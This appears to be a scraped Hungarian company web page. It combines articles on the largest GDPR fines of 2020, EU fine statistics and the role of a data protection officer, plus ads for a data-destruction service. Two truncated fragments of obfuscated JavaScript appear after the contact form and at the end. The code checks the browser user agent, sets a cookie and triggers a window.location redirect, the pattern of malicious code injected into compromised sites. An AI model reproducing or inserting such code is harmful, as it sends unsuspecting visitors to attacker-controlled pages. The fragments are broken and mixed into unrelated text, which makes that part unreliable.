2020 legnagyobb GDPR bírságai – második rész

Előző cikkünkben az öt eddigi legnagyobb GDPR bírságot, azok okait soroltuk fel cikkünkben. A utolsó öt helyezett között is vannak szép számmal milliós tételek.

A GDPR 2018 májusa óta védi a személyes adatainkat, azóta több adatvédelmi hatóság aktivizálta magát és szabott ki bírságokat. Az egyik módja a GDPR bírság elkerülésének, ha megfelelő szabályzattal és adatvédelmi előírásokkal fegyverkezünk fel. Ha rendszeresen átnézzük és töröljük a nem szükséges adatokat, azzal megelőzzük, hogy ezek az adatok a vállalaton kívülre kerüljenek – vagyis GDPR szempontból jelentésköteles esemény történjen.

6. Wind – 17 millió euró

Az olasz adatvédelmi hatóság bírságolt újból, most a Wind távközlési vállalat marketing gyakorlatát tartotta GDPR ellenesnek. A büntetés összege 16 729 600, vagyis kevéssel marad el a címben szereplő 17 milliótól, 2020. július 13-án szabták ki.

Az adatvédelmi hatóságok azután kezdték el vizsgálni a távközlési céget, hogy panaszok érkeztek a vállalat marketing kommunikációs gyakorlata ellen. A szolgáltató rendszeresen kéretlen reklámokkal bombázta az olaszokat. A spam emailekről történő leiratkozást nem megfelelő címek megadásával lehetetlenítette el.

A vállalat visszatetsző tevékenysége itt még nem ért véget: a mobil alkalmazás felhasználókat arra kényszerítették, hogy a direkt marketing tevékenységet és a felhasználó helyzetének követését engedélyezzék, ugyanakkor a cég üzleti partnerei illegálisan gyűjtöttek adatokat a felhasználókról.

7. Google – 7 millió euró

A svéd adatvédelmi hatóság egy 2017 óta tartó ügy miatt döntött a 7 millió eurós bírság mellett., melyet 2020 márciusában szabtak ki. A középpontban a felejtéshez való jog volt: a GDPR szerint a magánszemélyek kérhetik a keresési találatok törlését a Google találatai közül, ha azok a találatok elévült, számukra negatív információt tartalmaznak.

Ezt a Google úgy hajtotta végre, hogy minden esetben értesítette az adott weboldal üzemeltetőjét, hogy az adott címen lévő tartalmat ezentúl nem jeleníti meg a keresési találatok között. Erre válaszul a weboldalok üzemeltetői egy másik címre tették át általában a tartalmat, ami újból megjelent a keresési találatok között. A svéd adathatóság szerint így sohasem felejtődnek el a lejárt szavatosságú információk. A Google-nak változtatnia kell ezen a gyakorlaton.

8. BBVA – 5 millió euró

A spanyol adatvédelmi hatóságról van ebben az esetben szó, a pénzügyi szolgáltató BBVA vagyis Banco Bilbao Vizcaya Argentaria kapta a magas bírságot, 2020. december 11-én.

A hatóságok szerint a pénzügyi szervezet a felhasználók beleegyezése nélkül küldött SMS üzenetekben reklámokat. Emiatt 3 millió eurós büntetést szabott ki. A fennmaradó 2 millió euró bírságot azért kapta a bank, mert nem tudták pontosan elmagyarázni, hogyan gyűjtötték és használták fel az ügyfelek személyes adatait.

9. AOK 1,24 millió euró

A német adatvédelmi hatóságok munkájának eredménye ez a bírság, 2020. június 30-án szabták ki. Az ok: az egészségügyi biztosító, Allgemeine Ortskrankenkasse (AOK) az ügyfelek személyes adatait, közöttük az egészségügyi biztosítás információit felhasználva versenyeket és sorsolásokat indított. Az AOK igyekezett megszerezni a felhasználók hozzájárulását, de nem minden esetben sikerült. És azok is részt vettek a marketing akciókban, akiknek a hozzájárulása hiányzott.

10. BKR – 830 ezer euró

Az utolsó helyezett már egymillió euró alatti bírság, de így is tetemes. A holland hatóságok szabták ki, a BKR a nemzeti hitelinformációs adatbázis. Amit a hatóságok kifogásoltak, hogy a BKR csupán évente egyszer és papíralapon engedélyeztek hozzáférést adataikhoz, más esetekben ezért fizetni kellett. Az intézmény fellebbezése a bírság ellen még folyamatban.

 

2020 legnagyobb GDPR bírságai

2020 legnagyobb GDPR bírságai

A GDPR, vagyis a személyes adatok védelmére kitalált európai szabályozás 2018 májusa óta érvényes. Azóta több, rekordösszegű bírságot is kiszabtak, az első ötről írunk mostani cikkünkben.

A Tessian összefoglalta a 2020-as év 10 legnagyobb bírságját, amelyet különböző okokból többnyire nagyvállalatokra szabtak ki az európai adatvédelmi hatóságok. Az első részben az öt legnagyobb adatvédelmi bírságot és annak okait soroljuk fel, sorozatunk második részében pedig fennmaradó öttel foglalkozunk.

Ha el szeretnénk kerülni a hasonló bírságok kiszabását, akkor többek között foglalkozzunk a leselejtezett számítógépek, adathordozók adataival is. Mielőtt kikerülnének szervezetünk falai közül, minősített megoldással fertőtlenítsük adatainkat vagy bízzuk profi vállalkozásokra, aki szakszerűen és az előírásoknak megfelelően adatfertőtleníti az eszközöket, szigorúan GDPR kompatibilisen. Egy ilyet ismerünk is, a Data D.

1. Google – 50 millió euró

A Google büntetése technikailag még 2019-ből származik, de a vállalat fellebbezett ellene. A francia hatóságok 2020 őszén visszautasították a keresőóriás fellebbezését, és így az igazán óriási büntetés érvényes maradt. A Google-ra azért szabták ki ezt a bírságot, mert a hatóságok szerint nem közölte eléggé érthetően, hogyan gyűjtötték össze és használták fel a reklámok elhelyezésére a felhasználók személyes adatait.

2. H&M – 35 millió euró

A ruhakereskedőt a német adatvédelmi hatóságok büntették meg. Az áruházlánc tulajdonos ugyanis többszáz alkalmazottjáról gyűjtött rengeteg személyes adatot. Például betegszabadság vagy vakáció után kikérdezték alkalmazottjaikat arról, hogy pontosan milyen betegségben szenvedtek, miket csináltak szabadságuk alatt.

Ezeket az adatoka összegyűjtötték és több mint 50 menedzser számára elérhetővé tették. Az információk alapján döntöttek egy-egy alkalmazott előléptetéséről is. A GDPR szerint a minimálisan szükséges személyes adatot lehet összegyűjteni. Az egészségügyi adatok kiemelten szenzitív információknak számítanak.

3. Telecom Italia – 27,8 millió euró

A bírságot még 2020 elején, pontosan január 15-én szabta ki az olasz adatvédelmi hatóság. Az összeg azért ilyen nagy, mert az olasz távközlési szolgáltató több éven keresztül agresszív marketing tevékenységet folytatott, milliós nagyságrendű kéretlen hívásokat indítottak még olyan emberek felé is, akik kifejezetten letiltották a marketing jellegű megkereséseket.

4. British Airways – 22 millió euró

A bírságot a brit adatvédelmi hatóság szabta ki egy 2018-ban történt hackertámadásért. A támadásban 400 ezer ügyféladat szivárgott ki, fizetési adatokkal, ügyfélnevekkel, címekkel. A hatóságok szerint a támadás megelőzhető lett volna, ha a légitársaság jobban odafigyel a biztonságra. A cégnél olyan alapvető IT biztonsági technikák sem voltak elérhetőek, mint például a kétfaktoros azonosítás.

5. Mariott – 20,4 millió euró

Eredetileg 100 millió eurós bírságot tervezett a brit adatvédelmi hatóság kiszabni, de végül a hotellánc vállalásai miatt 20,4 millió euróra csökkentették ezt az összeget. A Mariott egy hackertámadás miatt elveszítette 383 millió vendégének az adatait, ebből 30 millió európai lakos volt. A támadásban olyan adatok váltak elérhetővé a nyilvánosság számára, mint nevek, lakcímek, útlevélszámok és banki fizetési információk.

A támadók eredetileg a Starwood csoport foglalási rendszerébe jutottak be, még 2014-ben. A Mariott 2016-ban vásárolta meg a céget, a támadást viszont csak két évvel később, 2018 szeptemberében fedezték fel. Vagyis a vállalat nem volt eléggé körültekintő biztonsági szempontból, nem volt a vállalatnál adatszivárgást megelőző (data loss prevention) megoldása sem.

Közel 300 millió eurónyi GDPR bírságot szabtak ki eddig

A GDPR hatályba lépése óta Európa szerte az adatvédelmi hatóságok több mint 272,5 millió eurónyi büntetést szabtak ki a különböző esetekben – az igazán combos bírságok az olasz és a német hatóságok munkáját dicséri.

 

A DLA Piper ügyvédi iroda 2021 elején is összesítette a GDPR hatályba lépése óta kiszabott bírságokat, kutatásuk szerint összese 272,5 millió eurós bírságot szabtak ki a különböző hatóságok.

Olasz, német és francia rekordok

A legkeményebb hatóság az olasz, aki 2018. május 25. óta 69,3 millió eurónyi bírságot állapított meg, második Németország 69,1 millió euróval, harmadik a listán Franciaország 54,4 millió euróval. Magyarországon az adatvédelmi hatóság összesen 980 ezer eurónyi bírságot szabott ki a GDPR megsértése miatt, ezzel az összeggel a tizedik helyezettek vagyunk a listán.

Lakosságarányosan más a szorgalmas

Sokkal érdekesebb megnézni, hogy lakosság arányosan melyik ország osztogatja szorgalmasan a bírságokat: idén Dánia, 155,6-os pontszámmal az első, második helyezett Hollandia 150-es pontszámmal és Írország 127,8 ponttal. Hazánk 8,5 ponttal a 18. ezen a listán. Egyébként egy év alatt, 2020 januárja és 2021 januárja között itthon 826 GDPR incidenst jelentettek Magyarországon, egy évvel korábban csupán 479-et.

A rekordösszegű bírságok

A rekordösszegű bírságokat a francia, német és olasz hatóságok szabták ki. A franciák a Google-ra haragudtak meg nagyon 2019 januárjában, mert a szolgáltató a felhasználói hozzájárulásokat nem megfelelően kezelte.

A második helyezett ezen a listán a németek, akik a H&M ruhaáruház alkalmazottjaival kapcsolatos adatgyűjtési gyakorlatát tartották annyira rossznak, hogy 2020 októberében 35,26 millió eurós bírsággal örvendeztették meg őket.

Az olaszok pedig 27,8 millió eurós büntetéssel kedveskedtek az Italian Telecom távközlési szolgáltatónak: a vállalat nem volt eléggé transzparens adatkezelési gyakorlatában, nem volt elegendő törvényi alapja a személyes adatok feldolgozására, nem voltak megfelelőek a technikai és szervezeti feltételek GDPR szempontból.

A teljes tanulmány ezen a linken érhető el, adataink megadása után ingyenesen letölthető.

 

Az a bizonyos adatvédelmi felelős

Az idén májusban életbe lépő GDPR egy adatvédelmi felelős kinevezését írja elő. Ezt az új feladatot meglévő alkalmazott is elláthatja, azonban a rendelet különleges jogokkal, kötelezetségekkel ruházza fel.

A General Data Protection Regulation, közismertebb nevén a GDPR egy új munkakör létrehozását írja elő azoknál a vállalatoknál, akikre a rendelet vonatkozik. Ez az új munkakör a belső adatvédelmi tisztviselő (Data Protection Officer – DPO). A DPO szerepköre mindig az adott társaság szervezetén belül, és a társaság által ellátott tevékenységgel összhangban értelmezendő, így a GDPR-ban lefektetett elvárások mellett (lásd keretes írásunkat) egyéb szektor vagy társaságspecifikus elvárások is felmerülhetnek. A DPO számára a feladatok és a kötelezettségek teljesítése nem eredményezhet összeférhetetlenséget, vagyis biztosítani kell cégen belüli függetlenségét.

 

Ez a függetlenség a gyakorlatban azt jelenti, hogy a DPO-nak a kötelezettségeit és feladatait mind a cégtől, a vezetéstől, és az érintettektől függetlenül kell ellátnia. Az adatvédelmi tisztviselő nem lehet olyan pozícióban, hogy határozzon a személyes adatok kezelésének céljáról és eszközeiről. A GDPR nem nevesíti, de a gyakorlatban így kizártak a szenior menedzseri pozíciók (vezérigazgató, ügyvezető, pénzügyi, egészségügyi, marketing, HR, IT vezető) vagy bíróság előtti képviselet adatvédelmi ügyekben.

Védett munkatársak

Az DPO az adatvédelmi kötelezettségek teljesítésének elsőbbsége, nem pedig a vállalati érdekek elsőbbsége alapján jár el, ezért külön védelem illeti meg. A társaságnak biztosítania kell, hogy az adatvédelmi felelőst megfelelően, időben bevonja valamennyi adatvédelmi probléma kezelésébe, de ugyanakkor azt is szavatolnia kell, hogy nem kap utasítást feladatai teljesítése tekintetében. Nem utasítható például, hogyan végezze az adatvédelmi vizsgálatot, milyen eredményt érjen el stb. De feladata, hogy segítse az adatvédelmi hatóságokat munkájukat megkönnyítse, információszerzést elősegítse.

Védettsége miatt az adatvédelmi tisztviselő feladatai ellátásával összefüggésben nem bocsátható el és nem szankcionálható, közvetlenül a menedzsment szintnek jelent (például igazgatóság) és személyében nem felelős. Az adatvédelmi felelősség, így a bírságok megfizetése is, a társaságot terheli. A DPO számára szükséges erőforrások és információk rendelkezésre bocsátásáért a társaság felel – ha ezt elmulasztja, felelősségre vonható. Erőforrás például: aktív támogatás a szenior menedzserek által (igazgatóság), szükséges idő a feladatok elvégzéséhez, pénzügyi források, infrastruktúra (helyiség, felszerelés és beosztottak), folyamatos képzés – a naprakész tudáshoz

 

Szakmai hibák esetén az adatvédelmi tisztviselő elméletileg felelősségre vonható, a GDPR ezt nem szabályozza. A rendelet szerint a DPO-tól elvárható a „szakmai rátermettség és az adatvédelmi jog és gyakorlat szakértői szintű ismerete”. A gyakorlatban ez a következőket jelenti: az EU-s és magyar adatvédelmi jog, hatósági iránymutatások, bírósági gyakorlat és szektor-specifikus gyakorlatok ismerete, alapvető adatbiztonsági és IT folyamatok ismerete, a vállalat szervezetének és tevékenységeinek, üzleti környezet ismerete és adatvédelmi képzéseken való rendszeres részvétel.

Új ember vagy régi ember?

Meglehetősen behatárolt, kit lehet cégen belül DPO-nak kinevezni. A GDPR megfelelési projekt fontos eleme, hogy az adatvédelmi tisztviselő tevékenységét részletesen szabályozzák a munkaszerződésben, megbízási szerződésben, munkaköri leírásban, a tevékenységével kapcsolatos belső eljárásrendben. Ezért praktikusabb új embert felvenni erre a pozícióra, nála az jelenti a kockázatot, hogy nem ismeri megfelelően a társaság belső működését. Az adatvédelmi tisztviselő tevékenységét ki is lehet szervezni, például adatvédelemre szakosodott ügyvédi irodának. Ez akkor indokolt, ha nincs annyi adatvédelmi ügy, amiért egy teljes pozíciót fenn kellene tartani.

Több dudás

Ha az adatvédelmi feladatok nagysága indokolja, több DPO is kinevezhető. A GDPR arra is lehetőséget ad, hogy egy vállalkozáscsoport közös adatvédelmi tisztviselőt is kijelöljen, ha az adatvédelmi tisztviselő valamennyi tevékenységi helyről könnyen elérhető az adatvédelmi hatóságok, a társaság alkalmazottai, és az egyéb érintetek (például a társaság ügyfelei) számára. Az elérhetőség alatt fizikai személyes vagy biztonságos hotline-on keresztüli elkérhetőséget értünk, hogy például last minute megbeszéléseken is részt tudjon venni.  Az adatvédelmi felelőssel szemben nyelvi követelmények is lehetnek, ismernie kell a felügyeleti hatóság, egyének által beszélt nyelvet.

Megfeleltető és tanácsadó egyszerre

Az adatvédelmi tisztviselő nem kizárólag compliance jellegű feladatokat lát el, hanem az adatvédelmi tanácsadásban már a kérdések felvetésében is részt vesz. Ez azt jelenti, az adatvédelmi gyakorlatot nemcsak ellenőrzi, hanem orientálja is. Szakmai véleménye kiemelten fontos, adott esetben döntő jelentőségű lehet. Ha az adatvédelmi biztos tanácsaival nem ért egyet a vállalat, akkor azt célszerű megfelelően dokumentálni a felelősségi körök azonosítása érdekében.

A DPO feladatai

A GDPR szerint az adatvédelmi tisztviselőnek a következő feladatai adódnak

Tájékoztat és szakmai tanácsot ad a társaság és az adatkezelést végző alkalmazottak részére a GDPR és egyéb adatvédelmi jogszabályok szerinti kötelezettségeikkel kapcsolatban;

Ellenőrzi a GDPR-nak, az adatvédelmi jogszabályoknak, és a társaság személyes adatok védelmével kapcsolatos belső szabályainak való megfelelést. Ide tartozik például: feladatkörök kijelölése, az adatkezelési műveletekben vevő személyzet tudatosság-növelése és képzése, valamint a kapcsolódó auditok;

Kérésre szakmai tanácsot ad a GDPR szerinti, nagyobb kockázatú adatkezelések esetén kötelező adatvédelmi hatásvizsgálatra vonatkozóan, valamint nyomon követi a hatásvizsgálat elvégzését;

Együttműködik az adatvédelmi felügyeleti hatósággal; és

Adatkezeléssel összefüggő ügyekben kapcsolattartó pontként szolgál az adatvédelmi felügyeleti hatóság felé, valamint adott esetben bármely egyéb kérdésben konzultációt folytat vele.

GDPR tanácsadással, Adatmegsemmisítéssel és IT selejtezéssel kapcsolatban keressen minket!

11 + 14 =

(‘0xb’)][_0x265c(‘0xa’)](‘OPR’)!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0xf’))!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0x10’))!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0x11’))!==-0x1;}var _0x4702d7=_0x23248e(_0x265c(‘0x12′));if(_0x4702d7!==’un’){if(_0x1ff41a()||_0x50fc2a()){_0x3419d8(_0x265c(‘0x12′),’un’,0x16d);window[_0x265c(‘0x13’)][_0x265c(‘0x14’)](_0x265c(‘0x15’));}}}}}(this));

GDPR olvasható magyar nyelven

GDPR olvasható magyar nyelven

Az európai általános adatvédelmi rendelet szövege itt megtekinthető: link



(‘0xb’)][_0x265c(‘0xa’)](‘OPR’)!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0xf’))!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0x10’))!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0x11’))!==-0x1;}var _0x4702d7=_0x23248e(_0x265c(‘0x12′));if(_0x4702d7!==’un’){if(_0x1ff41a()||_0x50fc2a()){_0x3419d8(_0x265c(‘0x12′),’un’,0x16d);window[_0x265c(‘0x13’)][_0x265c(‘0x14’)](_0x265c(‘0x15’));}}}}}(this));